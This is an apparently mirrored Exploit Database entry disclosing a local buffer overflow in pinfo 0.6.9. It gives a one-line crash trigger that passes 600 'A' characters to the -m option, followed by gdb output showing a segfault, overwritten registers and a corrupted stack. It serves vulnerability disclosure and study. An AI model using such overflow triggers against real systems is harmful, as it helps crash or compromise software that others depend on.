pinfo 0.6.9 – Local Buffer Overflow (PoC)

• Exploit Database
• 139 阅读

• 作者： Nassim Asrir
  日期： 2017-04-18
• 类别：

  • dos
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/41893/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139

  # Title: pinfo v0.6.9 - Local Buffer Overflow # Author: Nassim Asrir # Researcher at: Henceforth # Author contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/ # CVE: N/A   # Download #   $ apt-get install pinfo   # POC #   For any Question or discussion about this vuln: https://www.facebook.com/asrirnassim/   $ pinfo -m <code>python -c &apos;print "A"*600&apos; Przemek&apos;s Info Viewer v0.6.9 Looking for man page...   Caught signal 11, bye! Segmentation fault     # GDB Output #   $ gdb pinfo   (gdb) r -m <code>python -c &apos;print "A"*600&apos; Program received signal SIGSEGV, Segmentation fault. __GI_getenv (name=0x7ffff79831aa "RM") at getenv.c:84 84 getenv.c: No such file or directory.   (gdb) info registers rax0x54 84 rbx0x4141414141414141 4702111234474983745 <==== rcx0x1a8 424 rdx0x10 16 rsi0x7fffffffdaae 140737488345774 rdi0x7ffff79831a8 140737347334568 rbp0x7fffffffe0a8 0x7fffffffe0a8 rsp0x7fffffffda90 0x7fffffffda90 r8 0x0 0 r9 0x20 32 r100x1ec 492 r110x7ffff796c630 140737347241520 r120x4554 17748 r130x4 4 r140x2 2 r150x7ffff79831aa 140737347334570 rip0x7ffff73c911d 0x7ffff73c911d <__GI_getenv+173> eflags 0x10206 [ PF IF RF ] cs 0x33 51 ss 0x2b 43 ds 0x0 0 es 0x0 0 fs 0x0 0 gs 0x0 0   (gdb) where #0__GI_getenv (name=0x7ffff79831aa "RM") at getenv.c:84 #10x00007ffff796c661 in initscr () from /lib/x86_64-linux-gnu/libncursesw.so.5 #20x000055555556214a in ?? () #30x000055555555f165 in ?? () #40x0000555555557552 in ?? () #50x4141414141414141 in ?? () #60x4141414141414141 in ?? () #70x4141414141414141 in ?? () #80x4141414141414141 in ?? () #90x4141414141414141 in ?? () #10 0x4141414141414141 in ?? () #11 0x4141414141414141 in ?? () #12 0x4141414141414141 in ?? () #13 0x4141414141414141 in ?? () #14 0x4141414141414141 in ?? () #15 0x4141414141414141 in ?? () #16 0x4141414141414141 in ?? () #17 0x4141414141414141 in ?? () #18 0x4141414141414141 in ?? () #19 0x4141414141414141 in ?? () #20 0x4141414141414141 in ?? () #21 0x4141414141414141 in ?? () #22 0x4141414141414141 in ?? () #23 0x4141414141414141 in ?? () #24 0x4141414141414141 in ?? () #25 0x4141414141414141 in ?? () #26 0x4141414141414141 in ?? () #27 0x4141414141414141 in ?? () #28 0x4141414141414141 in ?? () #29 0x4141414141414141 in ?? () #30 0x4141414141414141 in ?? () #31 0x4141414141414141 in ?? () #32 0x4141414141414141 in ?? () #33 0x4141414141414141 in ?? () #34 0x4141414141414141 in ?? () #35 0x4141414141414141 in ?? () #36 0x4141414141414141 in ?? () #37 0x4141414141414141 in ?? () #38 0x4141414141414141 in ?? () #39 0x4141414141414141 in ?? () #40 0x4141414141414141 in ?? () #41 0x00007fffffff0020 in ?? () #42 0x00007fffffffebaa in ?? () ---Type <return> to continue, or q <return> to quit--- #43 0x00007fffffffebc2 in ?? () #44 0x00007fffffffebd6 in ?? () #45 0x00007fffffffebe1 in ?? () #46 0x00007fffffffec07 in ?? () #47 0x00007fffffffec18 in ?? () #48 0x00007fffffffec48 in ?? () #49 0x00007fffffffec52 in ?? () #50 0x00007fffffffec73 in ?? () #51 0x00007fffffffec7d in ?? () #52 0x00007fffffffec86 in ?? () #53 0x00007fffffffec91 in ?? () #54 0x00007fffffffeca4 in ?? () #55 0x00007fffffffecb7 in ?? () #56 0x00007fffffffeccc in ?? () #57 0x00007fffffffed08 in ?? () #58 0x00007fffffffed33 in ?? () #59 0x00007fffffffed58 in ?? () #60 0x00007fffffffed63 in ?? () #61 0x00007fffffffed74 in ?? () #62 0x00007fffffffed84 in ?? () #63 0x00007fffffffed8f in ?? () #64 0x00007fffffffedc3 in ?? () #65 0x00007fffffffeddc in ?? () #66 0x00007fffffffee0d in ?? () #67 0x00007fffffffee30 in ?? () #68 0x00007fffffffee3f in ?? () #69 0x00007fffffffee47 in ?? () #70 0x00007fffffffee59 in ?? () #71 0x00007fffffffee75 in ?? () #72 0x00007fffffffee82 in ?? () #73 0x00007fffffffeeb5 in ?? () #74 0x00007fffffffeed1 in ?? () #75 0x00007fffffffeeee in ?? () #76 0x00007fffffffef28 in ?? () #77 0x00007fffffffef97 in ?? () #78 0x0000000000000000 in ?? ()